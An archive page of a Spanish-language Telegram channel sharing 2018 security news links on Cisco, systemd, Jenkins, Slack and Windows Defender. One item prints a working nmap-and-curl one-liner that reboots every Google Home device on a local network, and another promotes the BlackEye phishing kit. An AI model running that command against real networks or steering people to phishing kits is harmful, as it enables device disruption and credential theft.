SysAdmin 24x7
Ir al canal en Telegram
Noticias y alertas de seguridad informática. Chat y contacto: t.me/sysadmin24x7chat
Mostrar más4 387
Suscriptores
+124 horas
-47 días
Sin datos30 días
Archivo de publicaciones
4 387
Cisco Security: Zero-day in SIP inspection engine of ASA 9.4+ and FTD 6.0+ software.
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181031-asaftd-sip-dos
4 387
Talos Vulnerability Deep Dive – TALOS-2018-0636 / CVE-2018-3971 Sophos HitmanPro.Alert vulnerability
https://blogs.cisco.com/security/talos/talos-vulnerability-deep-dive-talos-2018-0636-cve-2018-3971-sophos-hitmanpro-alert-vulnerability
4 387
Attacking Google Authenticator
A story about RFC 6238
https://www.unix-ninja.com/p/attacking_google_authenticator
4 387
📃"Ticket-Trick: acceder a cientos de empresas vía Slack con un simple truco" https://blog.segu-info.com.ar/2018/10/ticket-trick-acceder-cientos-de.html
Otra de Slack: "Este hacker consiguió acceder a cientos de empresas con un truco absurdamente simple" https://es.gizmodo.com/este-hacker-consiguio-acceder-a-cientos-de-empresas-con-1829749948
#Vulneraciones
4 387
📃 "Hello LinuxBoot, Goodbye UEFI: llega la alternativa libre del firmware" https://www.linuxadictos.com/linuxboot.html
Tanto el software privativo como el libre pueden tener más o menos la misma cantidad de amenazas de seguridad, para nosotras la diferencia esencial es que en el privativo no siempre lo puedes comprobar a fondo y en el libre sí.
4 387
Vulnerabilidad en Systemd DHCPv6 permite tomar el control remoto de la máquina
https://unaaldia.hispasec.com/2018/10/vulnerabilidad-en-systemd-dhcpv6-permite-tomar-el-control-remoto-de-la-maquina.html
4 387
Persistent GCP backdoors with Google’s Cloud Shell
https://medium.com/@89berner/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec
4 387
Google Home (in)Security
An undocumented API in Google home devices is easily exploitable.
This command will reboot any on your local network:
nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://%:8008/setup/reboot
https://jerrygamblin.com/2018/10/29/google-home-insecurity/
4 387
Nueva versión de Signal permite encriptar la identidad del remitente
https://unaaldia.hispasec.com/2018/10/nueva-version-de-signal-permite-encriptar-la-identidad-del-remitente.html
4 387
Security Tip (ST18-005)
Proper Disposal of Electronic Devices
https://www.us-cert.gov/ncas/tips/ST18-005
4 387
Evasión de sandbox en varios plugins de Jenkins
Fecha de publicación: 30/10/2018
Importancia: 4 - Alta
Recursos afectados:
Pipeline: Groovy Plugin
Script Security Plugin
Descripción:
Se ha publicado un aviso de seguridad que podría permitir a un atacante la evasión de mecanismos de protección proporcionados por la libreria Groovy Sandbox.
https://www.incibe-cert.es/alerta-temprana/avisos-seguridad/evasion-sandbox-varios-plugins-jenkins
4 387
Windows Built-in Antivirus Gets Secure Sandbox Mode – Turn It ON
https://thehackernews.com/2018/10/windows-defender-antivirus-sandbox.html
4 387
Malware para Mac intercepta tráfico cifrado para publicidad
http://unaaldia.hispasec.com/2018/10/malware-para-mac-intercepta-trafico.html
4 387
BlackEye, a newly released phishing kit with 32 built-in templates
USE FOR EDUCATIONAL PURPOSES ONLY
https://github.com/M4cs/BlackEye-Python
4 387
systemd: reexec state injection: fgets() on overlong lines leads to line splitting
https://bugs.chromium.org/p/project-zero/issues/detail?id=1687
4 387
Windows Defender becomes first antivirus to run inside a sandbox
Windows Defender with sandbox support rolled out to Windows insiders, but some Windows 10 users can enable it right now.
https://www.zdnet.com/article/windows-defender-becomes-first-antivirus-to-run-inside-a-sandbox/
